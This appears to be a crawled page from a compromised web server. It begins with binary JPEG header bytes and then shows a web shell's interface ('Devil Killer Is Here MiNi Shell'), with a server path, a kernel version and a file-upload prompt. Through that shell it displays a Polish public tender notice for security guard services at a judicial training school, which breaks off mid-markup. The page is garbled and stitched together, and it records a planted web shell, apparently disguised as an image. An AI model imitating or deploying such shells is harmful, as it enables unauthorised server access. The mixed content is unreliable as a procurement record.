JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241120/0060456001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Ochrona fizyczna osób i mienia świadczona na rzecz Krajowej Szkoły Sądownictwa i Prokuratury w lokalizacji: Kraków, Lublin, Dębe. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Krajowa Szkoła Sądownictwa i Prokuratury</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 140580428</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Przy Rondzie 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-547</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">12 617 96 15</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@kssip.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.kssip.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Ochrona fizyczna osób i mienia świadczona na rzecz Krajowej Szkoły Sądownictwa i Prokuratury w lokalizacji: Kraków, Lublin, Dębe. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c031c4dc-a41b-4fad-a561-a1df6057c70f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00604560</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00394591/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.9 Ochrona fizyczna osób i mienia świadczona na rzecz Krajowej Szkoły Sądownictwa i Prokuratury w lokalizacji: Kraków, Lublin, Dębe</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://e-propublico.pl/Zamawiajacy/AktualneOgloszenia?zamawiajacyId=d02d3ad5-085f-43bf-b39c-b8dd2427afd5 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://e-propublico.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W niniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem<br/>Platformy on-line działającej pod adresem https://e-propublico.pl. Korzystanie z Platformy przez Wykonawcę jest bezpłatne.<br/>Szczegółowe informacje zawiera Rozdział 8 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzule informacyjne z art. 13 i art. 14 RODO znajdują się w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BA-X.2611.23.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 2163729,33 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie usług ochrony fizycznej osób i mienia na rzecz Krajowej Szkoły Sądownictwa i Prokuratury w lokalizacji Kraków, ul. Przy Rondzie 5.<br/>Opis przedmiotu zamówienia oraz warunki, sposób realizacji zamówienia został szczegółowo określony w załącznikach do SWZ: opis przedmiotu zamówienia (załącznik nr 2 do SWZ część 1), projektowanych postanowieniach umowy (załącznik nr 3 do SWZ - część 1). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 1282922,40 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert i ich waga:<br/>1)Cena oferty – 60 pkt <br/>Pkt. za kryt. „cena oferty” zostaną obliczone wg. następującego wzoru: Cena oferty = [cena oferty z najniższą ceną] : [cena oferty ocenianej] x 60 pkt<br/>2)Doświadczenie pracowników – 20 pkt <br/>Pkt. za kryt. „dośw. pracowników” zostaną przyznane w nast. sposób: za skierowanie do realizacji zam. w zakr. świadczenia usług ochrony fizycznej osób i mienia (z wyłączeniem grup interwencyjnych oraz pracownika obsługującego szatnię), w czasie trwania umowy wyłącznie osób (spełniających każdy z następujących warunków): a)legitymującym się minimum 3-letnim dośw. w pracy w charakterze pracownika ochrony fizycznej w obiektach użyteczności publicznej (w rozumieniu definicji obiektu wskazanej w rozdziale 6 ust. 2 pkt 4 lit. a) i wpisanych na listę pracowników kwalifikowanych, zgodnie z ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i mienia, b)oraz posiadających dośw. związ. z obsługą systemu sygnalizacji pożarowej, oddymiania, włamania i napadu, telewizji przemysłowej. Wykonawca otrzyma 20 punktów.<br/>3)Kwalifikacje zawodowe pracowników- 15 pkt 3.1 Pkt za kryterium „kwalifikacje zawodowe pracowników” zostaną przyznane w następujący sposób: za skierowanie do realizacji zam. w zakresie świadczenia usług ochrony fizycznej osób i mienia (z wyłączeniem grup interwencyjnych oraz pracownika obsługującego szatnię), w czasie trwania umowy, wyłącznie osób, które odbyły szkolenie z obsługi klienta ze szczególnymi potrzebami (zgodnie z definicją zawartą w ustawie z dnia 19 lipca 2019 r. o zapewnianiu dostępności osobom ze szczególnymi potrzebami (t. j. Dz. U. z 2024 r. poz. 1411) osoba ze szczególnymi potrzebami to osoba, która ze względu na swoje cechy zewnętrzne lub wewnętrzne, albo ze względu na okoliczności, w których się znajduje, musi podjąć dodatkowe działania lub zastosować dodatkowe środki w celu przezwyciężenia bariery, aby uczestniczyć w różnych sferach życia na zasadzie równości z innymi osobami). Wykonawca otrzyma 5 punktów.<br/>3.2 Punkty za kryterium „kwalifikacje zawodowe pracowników” zostaną przyznane w następujący sposób: za skierowanie do realizacji zam. w zakresie świadczenia usług ochrony fizycznej osób i mienia (z wyłączeniem grup interwencyjnych oraz pracownika obsługującego szatnię), w czasie trwania umowy wyłącznie osób, które odbyły szkolenie z udzielania pierwszej pomocy przedmedycznej. Wykonawca otrzyma 5 punktów.<br/>3.3 Punkty za kryterium „kwalifikacje zawodowe pracowników” zostaną przyznane w następujący sposób: za skierowanie do realizacji zam. w zakresie świadczenia usług ochrony fizycznej osób i mienia (z wyłączeniem grup interwencyjnych oraz pracownika obsługującego szatnię), w czasie trwania umowy wyłącznie osób, które odbyły szkolenie z obsługi (AED).Wykonawca otrzyma 5 punktów. Maksymalnie w kryterium kwalifikacje zawodowe pracowników można otrzymać 15 pkt.<br/>4)Aspekt społeczny – 5 pkt. Punkty za kryterium „Aspekt społeczny” zostaną przyznane w następujący sposób: Wykonawca otrzyma dodatkowe punkty za skierowanie do realizacji zamówienia w zakresie świadczenia usług ochrony osób i mienia (z wyłączeniem grup interwencyjnych oraz pracownika obsługującego szatnię),w czasie trwania umowy, co najmniej jednej osoby: a)bezrobotnej w rozumieniu ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (t. j. Dz. U. z 2024 r. poz. 475 ze zm.) lub b)	do 30. roku życia lub po ukończeniu 50. roku życia, posiadającej status osoby poszukującej pracy, bez zatrudnienia. Wykonawca otrzyma 5 punktów.<br/>Maksymalnie oferta może uzyskać 100 pkt. P= A+B+C+D Gdzie: <br/>P – całkowita liczba punktów przyznana badanej ofercie,<br/>A – liczba punktów przyznanych badanej ofercie w kryterium „Cena brutto zamówienia”<br/>B – liczba punktów przyznanych badanej ofercie w kryterium „Doświadczenie pracowników”<br/>C- liczba punktów przyznanych badanej ofercie w kryterium „Kwalifikacje zawodowe pracowników”<br/>D- liczba punktów przyznanych badanej ofercie w kryterium „Aspekt społeczny”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekt społeczny</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie pracowników</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje zawodowe pracowników</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie usług ochrony fizycznej osób i mienia na rzecz Krajowej Szkoły Sądownictwa i Prokuratury w lokalizacji Lublin, ul. Krakowskie Przedmieście 62.<br/>Opis przedmiotu zamówienia oraz warunki, sposób realizacji zamówienia został szczegółowo określony w załącznikach do SWZ: opis przedmiotu zamówienia (załącznik nr 2 do SWZ - część 2), projektowanych postanowieniach umowy (załącznik nr 3 do SWZ - część 2). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 519314,76 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert i ich waga:<br/>1) Cena oferty – 60 pkt.<br/>Punkty za kryterium „cena oferty” zostaną obliczone według następującego wzoru:<br/>Cena oferty = [cena oferty z najniższą ceną] : [cena oferty ocenianej] x 60 pkt<br/>2)	Doświadczenie pracowników – 40 pkt.<br/>Punkty za kryterium „doświadczenie pracowników” zostaną przyznane<br/>w następujący sposób:<br/>za skierowanie do realizacji zamówienia w zakresie świadczenia usług ochrony osób i mienia (z wyłączeniem grup interwencyjnych), w czasie trwania umowy wyłącznie osób (spełniających każdy z następujących warunków):<br/>a)	legitymujących się minimum 3-letnim doświadczeniem w pracy<br/>w charakterze pracownika ochrony fizycznej w obiektach użyteczności<br/>publicznej (w rozumieniu definicji wskazanej w rozdziale 6 ust. 2 pkt 4 lit. c) i wpisanych na listę pracowników kwalifikowanych, zgodnie z ustawą z dnia<br/>22 sierpnia 1997 r. o ochronie osób i mienia,<br/>b)	oraz posiadających doświadczenie związane z obsługą systemu przeciwpożarowego, systemu oddymiania, systemu sygnalizacji włamania i napadu, systemu kontroli dostępu, systemu domofonowego, systemu telewizji przemysłowej.<br/>Wykonawca otrzyma 40 punktów.<br/>Maksymalnie oferta może uzyskać 100 pkt.<br/>P= A+B<br/>Gdzie:<br/>P – całkowita liczba punktów przyznana badanej ofercie,<br/>A – liczba punktów przyznanych badanej ofercie w kryterium „Cena brutto zamówienia”<br/>B – liczba punktów przyznanych badanej ofercie w kryterium „Doświadczenie pracowników”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie pracowników</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie usług ochrony fizycznej osób i mienia na rzecz Krajowej Szkoły Sądownictwa i Prokuratury w ośrodku szkoleniowym w Dębem, 05-140 Serock.<br/>Opis przedmiotu zamówienia oraz warunki, sposób realizacji zamówienia został szczegółowo określony w załącznikach do SWZ: opis przedmiotu zamówienia (załącznik nr 2 do SWZ- część 3), projektowanych postanowieniach umowy (załącznik nr 3 do SWZ- część 3). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 361492,17 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert i ich waga:<br/>7)	Cena oferty – 90 pkt.<br/>Punkty za kryterium „cena oferty” zostaną obliczone według następującego wzoru:<br/>Cena oferty = [cena oferty z najniższą ceną] : [cena oferty ocenianej] x 90 pkt<br/>8)	Aspekt społeczny- 10 pkt.<br/>Wykonawca otrzyma dodatkowe punkty za skierowanie do realizacji zamówienia w zakresie świadczenia usług ochrony osób i mienia, w czasie trwania umowy przynajmniej jednej osoby:<br/>a) bezrobotnej w rozumieniu ustawy z dnia 20 kwietnia 2004 r. o promocji<br/>zatrudnienia i instytucjach rynku pracy (t.j. Dz. U. z 2024 r. poz. 475 ze zm.); lub<br/>b) do 30. roku życia lub po ukończeniu 50. roku życia, posiadającej status osoby<br/>poszukującej pracy, bez zatrudnienia; lub<br/>c) niepełnosprawnej w rozumieniu ustawy z dnia 27 sierpnia 1997 r. o<br/>rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych, o<br/>ile osoba ta posiada faktyczną możliwość wykonywania czynności świadczenia usług ochrony fizycznej opisanej w opisie przedmiotu zamówienia.<br/>Maksymalnie oferta może uzyskać 100 pkt.<br/>P= A+B<br/>Gdzie:<br/>P – całkowita liczba punktów przyznana badanej ofercie,<br/>A – liczba punktów przyznanych badanej ofercie w kryterium „Cena brutto zamówienia”<br/>B - liczba punktów przyznanych badanej ofercie w kryterium „Aspekt społeczny”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekt społeczny</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p 